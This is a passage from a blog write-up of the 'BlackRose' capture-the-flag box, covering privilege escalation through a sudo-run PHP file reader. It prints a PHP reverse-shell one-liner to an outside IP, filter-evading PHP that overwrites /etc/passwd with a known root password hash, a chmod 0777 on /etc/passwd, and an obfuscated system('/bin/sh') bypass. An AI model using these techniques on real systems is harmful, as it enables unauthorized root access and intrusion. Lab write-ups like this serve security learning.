yourname@BlackRose:~$ echo '<?php $sock=fsockopen("192.168.1.101",443);popen("/bin/bash <&3 >&3 2>&3", "r"); ?>' > 1.php
yourname@BlackRose:~$ sudo /usr/bin/blackrose
File read~# 1.php
Dangerous function found
```

Ran into a new problem: there seems to be a dangerous-function filter. I tried to bypass it myself with reference to the blog PHP - Useful Functions & disable_functions/open_basedir bypass - HackTricks

I first tried chown and found I could not set the SUID bit. Trying file reads and writes, I found that file_get_contents and file_put_contents work. I first read the shadow file, but cracking it with hashcat failed, so let's try writing to the passwd file instead

First generate a simple password hash

```
yourname@BlackRose:~$ openssl passwd 123456
l.ceEHjBRBt96
```

I used ChatGPT to generate code that replaces the first line of a file with file_put_contents. The program also appears to match on the root keyword, so the string needs a little splitting to get around that. If you try this yourself, do not start with passwd: test on an ordinary file first, confirm it works, then modify passwd, and back up the original /etc/passwd beforehand

```php
<?php
$filename = '/etc/passwd';
$newContent0 = 'roo';
$newContent1 = 't:';
$newContent2 = 'l.ceEHjBRBt96';
$newContent3 = ':0:0:roo';
$newContent4 = 't:/roo';
$newContent5 = 't:/bin/bas';
$newContent6 = 'h';
$newContent = $newContent0 . $newContent1 . $newContent2 . $newContent3 . $newContent4 . $newContent5 . $newContent6;

$content = file_get_contents($filename);

$firstLineEndPos = strpos($content, "\n");

if ($firstLineEndPos !== false) {
    $firstLine = substr($content, 0, $firstLineEndPos + 1);
    $content = str_replace($firstLine, $newContent . "\n", $content);
    file_put_contents($filename, $content);
    echo file_get_contents($filename);
} else {
    echo "error";
}
?>
```

Write the above code into 1.php and try running it through blackrose

```
yourname@BlackRose:~$ sudo /usr/bin/blackrose
File read~# 1.php
root:l.ceEHjBRBt96:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false
delx:x:1002:1002:,,,:/home/delx:/bin/bash
yourname:x:1001:1001:,,,:/home/yourname:/bin/bash
```

Written successfully; now switch to root with the password 123456

```
yourname@BlackRose:~$ su
Password:
root@BlackRose:/home/yourname# cd /root
root@BlackRose:~# ls -liah
total 36K
2097153 drwx------ 6 root root 4.0K Jul 11 2020 .
2 drwxr-xr-x 24 root root 4.0K Nov 13 2019 ..
2097158 lrwxrwxrwx 1 root root 9 Dec 3 2019 .bash_history -> /dev/null
2097154 -rw-r--r-- 1 root root 3.1K Dec 3 2019 .bashrc
2097164 drwx------ 2 root root 4.0K Dec 5 2019 .cache
2097162 drwx------ 3 root root 4.0K Nov 7 2019 .gnupg
2097159 drwxr-xr-x 3 root root 4.0K Nov 7 2019 .local
2097155 -rw-r--r-- 1 root root 148 Aug 17 2015 .profile
2097168 -rw-r--r-- 1 root root 511 Jul 11 2020 root.txt
2097156 drwx------ 2 root root 4.0K Sep 7 2019 .ssh
root@BlackRose:~# cat root.txt
_ _ _
| | _____ _____| | __ ____ _ ___ | |__ ___ _ __ ___
_ | |/ _ \ \ /\ / / _ \ | \ \ /\ / / _` / __| | '_ \ / _ \ '__/ _ \
| |_| | __/\ V V / __/ | \ V V / (_| \__ \ | | | | __/ | | __/
\___/ \___| \_/\_/ \___|_| \_/\_/ \__,_|___/ |_| |_|\___|_| \___|
The box made by Jewel



7dcbcf000f38c8d2c0024011899ec84e

I thank you so much for playing - Jewel :)
```

Game over.

Addendum: chmod cannot set the SUID bit, but it can loosen the permissions on passwd

```
yourname@BlackRose:~$ cat 2.php
<?php
chmod("/etc/passwd",0777);
?>
yourname@BlackRose:~$ sudo /usr/bin/blackrose
File read~# 2.php
yourname@BlackRose:~$ ls -alih /etc/passwd
3154567 -rwxrwxrwx 1 root root 1.7K Oct 14 08:48 /etc/passwd
yourname@BlackRose:~$ vim /etc/passwd
```

The walkthrough I referenced used a simpler bypass that I had not seen before and that did not show up in searches either, so I am noting it here

```
echo "<?php (sy.(sy).em)('/bin/sh') ?>" > 1.php
```

Summary

Login form test points

  • Login bypass (logic flaws, language quirks)
  • SQL injection (universal password)
  • Weak passwords (brute force)
  • Second-order injection
  • Registration overwrite
  • Unauthorized access (directory scanning)

Some CTF techniques inherently carry a trial-and-error cost, especially encoding problems, such as deciding on this box that it is AES and deciding that it is rot47. More than anything, it is familiarity with how and how often encryption algorithms are used that lets you think of it, plus constant trial and error.

Beyond that, it is worth occasionally reading other people's blogs and summaries of pentesting tricks, like the login bypass here: very simple, but I had never come across it, so I could not think of it and did not even think to search for "login bypass". In future I should leaf through HackTricks - HackTricks now and then

References

The password toolbox oreosES/autodecoder: AutoDecoder tool for CTFs (github.com), mentioned in 挖洞实战之信息泄露与前端加密 - 合天网安实验室 (hetianlab.com)


BlackRose box
https://i3eg1nner.github.io/2023/10/fcad96c9b901.html
Author: I3eg1nner
Published: 12 October 2023